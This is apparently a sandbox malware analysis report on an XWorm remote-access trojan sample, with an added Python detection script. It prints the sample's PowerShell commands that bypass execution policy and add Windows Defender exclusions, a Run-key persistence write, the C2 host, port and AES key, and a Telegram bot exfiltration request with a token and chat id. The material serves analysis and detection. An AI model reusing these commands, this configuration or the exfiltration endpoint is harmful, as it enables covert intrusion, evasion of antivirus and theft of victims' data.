
Windows Analysis Report
9RgE5uOJwX.exe

Overview

General Information

Sample name: 9RgE5uOJwX.exe (renamed because the original name is a hash value)
Original sample name: 72f5f19b35b22d82d8459f5e0739c248.exe
Analysis ID: 1545317
MD5: 72f5f19b35b22d82d8459f5e0739c248
SHA1: 0218dd2b354dcfdff2a11d06b6cf57f53987e9eb
SHA256: 4571751b2b7477fded0012f46aded7c86fb93194980897418c17ac917c4d4cc1
Tags: 32, AsyncRAT, exe, trojan

Detection

XWorm
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 9RgE5uOJwX.exe (PID: 2732 cmdline: "C:\Users\user\Desktop\9RgE5uOJwX.exe" MD5: 72F5F19B35B22D82D8459F5E0739C248)
    • powershell.exe (PID: 5168 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MicrosoftClient.exe (PID: 5580 cmdline: "C:\Users\user\AppData\Local\MicrosoftClient.exe" MD5: 72F5F19B35B22D82D8459F5E0739C248)
  • MicrosoftClient.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Local\MicrosoftClient.exe" MD5: 72F5F19B35B22D82D8459F5E0739C248)
  • cleanup
Malware Configuration

{"C2 url": ["vehicle-temp.gl.at.ply.gg"], "Port": "1930", "Aes key": "<!QAZxcvbnm,./>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Overview

Sample
Source | Rule | Description | Author
9RgE5uOJwX.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
9RgE5uOJwX.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
9RgE5uOJwX.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xd79f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd83c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xd951:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xd244:$cnc4: POST / HTTP/1.1

PCAP
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security

Dropped files
Source | Rule | Description | Author
C:\Users\user\AppData\Local\MicrosoftClient.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\MicrosoftClient.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Local\MicrosoftClient.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xd79f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd83c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xd951:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xd244:$cnc4: POST / HTTP/1.1

Memory dumps
Source | Rule | Description | Author
00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xf25f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xf2fc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf411:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xed04:$cnc4: POST / HTTP/1.1
00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xd59f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd63c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xd751:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xd044:$cnc4: POST / HTTP/1.1
Process Memory Space: 9RgE5uOJwX.exe PID: 2732 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Unpacked PEs
Source | Rule | Description | Author
0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xd79f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd83c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xd951:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xd244:$cnc4: POST / HTTP/1.1
0.0.9RgE5uOJwX.exe.cf0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.9RgE5uOJwX.exe.cf0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
(3 further entries not shown)

                          System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RgE5uOJwX.exe", ParentImage: C:\Users\user\Desktop\9RgE5uOJwX.exe, ParentProcessId: 2732, ParentProcessName: 9RgE5uOJwX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', ProcessId: 5168, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RgE5uOJwX.exe", ParentImage: C:\Users\user\Desktop\9RgE5uOJwX.exe, ParentProcessId: 2732, ParentProcessName: 9RgE5uOJwX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', ProcessId: 5168, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\MicrosoftClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\9RgE5uOJwX.exe, ProcessId: 2732, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftClient
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RgE5uOJwX.exe", ParentImage: C:\Users\user\Desktop\9RgE5uOJwX.exe, ParentProcessId: 2732, ParentProcessName: 9RgE5uOJwX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', ProcessId: 5168, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RgE5uOJwX.exe", ParentImage: C:\Users\user\Desktop\9RgE5uOJwX.exe, ParentProcessId: 2732, ParentProcessName: 9RgE5uOJwX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe', ProcessId: 5168, ProcessName: powershell.exe

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-30T12:22:53.328109+0100 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.6 | 49399 | 149.154.167.220 | 443 | TCP
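The four PowerShell children in the process tree and the Run-key write recorded above are what the Sigma rules named in the signature list (Powershell Defender Exclusion, Change PowerShell Policies to an Insecure Level, CurrentVersion Autorun Keys Modification) fire on. The following Python is an added example and not part of the Joe Sandbox report or of the Sigma rules themselves: it runs equivalent matching over constructed Sysmon-style events whose command lines, parent/child relationship and registry value are copied from this report, adds two benign control events that are invented for contrast, and correlates the self-exclusion with the autorun write by parent PID. The event field names and severity labels are assumptions of this example.

```python
"""Detection logic over constructed Sysmon-style events, modelled on the
Sigma hits in this report (added example, not sandbox output)."""
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPPER = r"C:\Users\user\Desktop\9RgE5uOJwX.exe"

# Constructed events. The first four mirror the report (PIDs 2732, 5168, 5268
# and the HKCU Run value); the last two are invented benign controls.
EVENTS = [
    {"EventID": 1, "ProcessId": 2732, "ParentProcessId": 1234, "Image": DROPPER,
     "CommandLine": f"\"{DROPPER}\""},
    {"EventID": 1, "ProcessId": 5168, "ParentProcessId": 2732, "Image": PS,
     "CommandLine": f"\"{PS}\" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '{DROPPER}'"},
    {"EventID": 1, "ProcessId": 5268, "ParentProcessId": 2732, "Image": PS,
     "CommandLine": f"\"{PS}\" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'"},
    {"EventID": 13, "ProcessId": 2732, "Image": DROPPER, "EventType": "SetValue",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftClient",
     "Details": r"C:\Users\user\AppData\Local\MicrosoftClient.exe"},
    # control: an administrator merely listing exclusions must not fire
    {"EventID": 1, "ProcessId": 9001, "ParentProcessId": 4321, "Image": PS,
     "CommandLine": f"\"{PS}\" Get-MpPreference"},
    # control: a vendor autorun under Program Files is reported at low severity
    {"EventID": 13, "ProcessId": 9002, "Image": r"C:\Program Files\Vendor\setup.exe", "EventType": "SetValue",
     "TargetObject": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r"C:\Program Files\Vendor\agent.exe"},
]

# Add-MpPreference with any of the exclusion parameters (path, process name, extension, IP).
EXCLUSION_RE = re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension|IpAddress)\b", re.I)
# -ExecutionPolicy / -ep set to a policy that disables script signing checks.
POLICY_RE = re.compile(r"-(?:ExecutionPolicy|ep)\s+(?:Bypass|Unrestricted)\b", re.I)
# Run / RunOnce autostart keys under CurrentVersion (HKCU or HKLM).
RUNKEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)
# Autorun targets in user-writable locations are the suspicious ones.
USER_WRITABLE_RE = re.compile(r"\\(?:AppData|Temp|Users\\Public|Downloads|Desktop)\\", re.I)


def match_event(ev):
    """Return a list of (rule title, severity) pairs for one event."""
    hits = []
    if ev["EventID"] == 1:
        cmd = ev.get("CommandLine", "")
        if EXCLUSION_RE.search(cmd):
            hits.append(("Powershell Defender Exclusion", "high"))
        if POLICY_RE.search(cmd):
            hits.append(("Change PowerShell Policies to an Insecure Level", "medium"))
    elif ev["EventID"] == 13 and RUNKEY_RE.search(ev.get("TargetObject", "")):
        sev = "high" if USER_WRITABLE_RE.search(ev.get("Details", "")) else "low"
        hits.append(("CurrentVersion Autorun Keys Modification", sev))
    return hits


def scan(events):
    """Per-event findings plus one correlation: a process that both wrote an
    autorun value and spawned a Defender-exclusion PowerShell child is the
    self-protecting dropper pattern seen in this report, so it is escalated."""
    findings, exclusion_parents, autorun_writers = [], set(), set()
    for ev in events:
        for title, sev in match_event(ev):
            findings.append({"pid": ev["ProcessId"], "rule": title, "severity": sev})
            if title == "Powershell Defender Exclusion":
                exclusion_parents.add(ev.get("ParentProcessId"))
            elif title == "CurrentVersion Autorun Keys Modification":
                autorun_writers.add(ev["ProcessId"])
    for pid in sorted(exclusion_parents & autorun_writers):
        findings.append({"pid": pid, "rule": "Self-exclusion plus autorun from one process", "severity": "critical"})
    return findings


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f"[{f['severity']:>8}] pid={f['pid']} {f['rule']}")
```

Note the `-ExclusionProcess '9RgE5uOJwX.exe'` and `-ExclusionProcess 'MicrosoftClient.exe'` variants in the tree: a process exclusion is keyed on image name only, so it also covers the copy later written to `%LocalAppData%`, which is why the correlation keys on the parent that issued the exclusions rather than on the excluded path.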


                          AV Detection

Source: 9RgE5uOJwX.exe | Malware Configuration Extractor: Xworm {"C2 url": ["vehicle-temp.gl.at.ply.gg"], "Port": "1930", "Aes key": "<!QAZxcvbnm,./>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | ReversingLabs: Detection: 81%
Source: 9RgE5uOJwX.exe | ReversingLabs: Detection: 81%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Joe Sandbox ML: detected
Source: 9RgE5uOJwX.exe | Joe Sandbox ML: detected
Source: 9RgE5uOJwX.exe | String decryptor: vehicle-temp.gl.at.ply.gg
Source: 9RgE5uOJwX.exe | String decryptor: 1930
Source: 9RgE5uOJwX.exe | String decryptor: <!QAZxcvbnm,./>
Source: 9RgE5uOJwX.exe | String decryptor: <Xwormmm>
Source: 9RgE5uOJwX.exe | String decryptor: XWorm V5.6
Source: 9RgE5uOJwX.exe | String decryptor: USB.exe
Source: 9RgE5uOJwX.exe | String decryptor: %LocalAppData%
Source: 9RgE5uOJwX.exe | String decryptor: MicrosoftClient.exe
Source: 9RgE5uOJwX.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49399 version: TLS 1.2
Source: 9RgE5uOJwX.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                          Networking

Source: Network traffic | Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.6:49399 -> 149.154.167.220:443
Source: Malware configuration extractor | URLs: vehicle-temp.gl.at.ply.gg
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 9RgE5uOJwX.exe, type: SAMPLE
Source: Yara match | File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.6:49406 -> 147.185.221.23:1930
Source: global traffic | HTTP traffic detected: GET /bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=7247076886&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC0ADF584DA274A411213%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K2C7BZM9L%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1; Host: api.telegram.org; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 147.185.221.23
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=7247076886&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC0ADF584DA274A411213%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K2C7BZM9L%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1; Host: api.telegram.org; Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: vehicle-temp.gl.at.ply.gg
Source: powershell.exe, 00000008.00000002.2468170958.000002A71F4C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000008.00000002.2468170958.000002A71F4C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 0000000B.00000002.2648363844.000001867A108000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.2223406932.0000020090071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2310348325.0000023A11CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2449436475.000002A717021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2207375824.000002008022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A7071DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2207375824.0000020080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A706FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2207375824.000002008022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A7071DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2232053080.00000200F2397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2232624832.00000200F2687000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.2232053080.00000200F2397000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.coiops
Source: powershell.exe, 00000002.00000002.2207375824.0000020080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A706FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: 9RgE5uOJwX.exe, MicrosoftClient.exe.0.dr | String found in binary or memory: https://api.telegram.org/bot
Source: 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=72470
Source: powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2223406932.0000020090071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2310348325.0000023A11CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2449436475.000002A717021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 49399 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49399
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49399 version: TLS 1.2
